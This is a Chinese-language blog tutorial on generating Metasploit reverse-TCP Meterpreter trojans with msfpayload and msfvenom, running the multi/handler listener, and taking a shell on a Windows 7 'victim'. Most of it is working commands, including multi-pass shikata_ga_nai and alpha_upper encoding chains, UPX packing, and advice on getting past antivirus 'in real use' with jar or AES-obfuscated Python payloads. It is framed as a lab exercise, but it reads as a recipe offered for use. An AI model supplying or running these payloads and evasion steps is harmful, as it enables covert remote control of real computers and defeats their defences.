Metasploit之我的远程控制软件
参考文献:http://www.evil0x.com/posts/838.html(Metasploit 渗透测试笔记(Meterpreter篇))
木马程序-->控制端(攻击者)-->服务端(攻击目标)
测试环境:
攻击者:kali-linux -->192.168.2.146
受害者:Windows07 -->192.168.2.107
------------------------------------------------------------------------------------------------
(一)以下为kali-linux-1.0系统下的生成与连接方式(使用msfpayload命令的)
参考文献:http://jingyan.baidu.com/article/6b97984dbee2881ca2b0bf33.html
免杀Payload生成:https://my.oschina.net/u/1585857/blog/500183
首先在我们的kali-linux下生成一个木马程序,需要设置连接我们的IP和端口
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
命令解释:
msfpayload -->生成木马/文件的命令
windows/meterpreter/reverse_tcp -->(生成)这样的一个木马程序
LHOST=192.168.2.146 -->设置本地IP地址
LPORT=44444 -->设置本地端口
X -->选用二进制方式
> -->写入,举例:echo 1>test.txt(将“1”写入文本)
test.exe -->生成的木马程序名字
这样生成的木马文件在当前系统目录下test.exe
之后在metasploit下连接后门程序,步骤如下:
msfconsole-->开启metasploit
use exploit/multi/handler -->使用“exploit/multi/handler”这个模块连接后门程序
show options -->查看需要设置的配置信息//这里其实不需要配置任何信息的
set PAYLOAD windows/meterpreter/reverse_tcp -->使用tcp反向连接
show options -->查看需要设置的配置信息
set LHOST=192.168.2.146 -->设置我们攻击者自己的连接IP
set LPORT=44444 -->设置我们攻击浙自己的连接端口
exploit -->执行连接,等待木马执行后连接
PS:连接成功后可以直接“shell”命令拿下shell
------------------------------------------------------------------------------------------------
(二)以下为kali-linux-2.0系统下的生成与连接方式(使用msfvenom命令的)
参考文献:http://www.77169.com/hack/201602/224112.shtm
类似文献:http://www.i0day.com/1173.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe
以上就是基本命令,解释一下,-p后面是payload名称,然后是你的ip和端口(payload参数),然后是-f 格式,由于是实验就先设置exe,然后-o payload.exe指保存为payload.exe。当然,实验的时候可以把格式设置成exe,但是实战的时候毕竟有杀毒软件,所以格式最好是jar(要求对方有java环境,可以用来拿java web网站的时候使用),或者设置成python然后自行shellcode免杀(用Python容器),然后用AES混淆Python代码,再用pyinstaller编译exe,这是目前最完美的过杀毒软件方案,就连勒索软件都不会被杀毒软件干掉,除非有特殊动作(比如修改注册表)。当然,楼主还有很多要学习。
具体步骤如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe -o test.exe -->在当前目录下生成木马程序test.exe,PS:生成payload.exe不会被杀,test.exe被秒杀
PS:之后的操作步骤是和上面的一样的↓
之后在metasploit下连接后门程序,步骤如下:
msfconsole -->开启metasploit
use exploit/multi/handler -->使用“exploit/multi/handler”这个模块连接后门程序
show options -->查看需要设置的配置信息//这里其实不需要配置任何信息的
set PAYLOAD windows/meterpreter/reverse_tcp -->使用tcp反向连接
show options -->查看需要设置的配置信息
set LHOST=192.168.2.146 -->设置我们攻击者自己的连接IP
set LPORT=44444 -->设置我们攻击浙自己的连接端口
exploit -->执行连接,等待木马执行后连接
PS:连接成功后可以直接“shell”命令拿下shell
------------------------------------------------------------------------------------------------
(三)在BT5系统下的生成与连接方式(使用msfvenom命令的)
参考文献:http://www.i0day.com/1173.html
PS:没有环境,不做测试。
因为BT5下也是运用msfvenom命令,所以和kali-linux-2.0的步骤是一样的,区别就是使用模块不一样
以下是文章复制文本
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:
2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:
3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘/x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe
upx加壳:upx -5 /root/Desktop/acn.exe
结果:
说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abc.exe放到win7下.执行.
5,在命令行下,打开msfconsole.
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
结果:
7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.
8,.验证
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论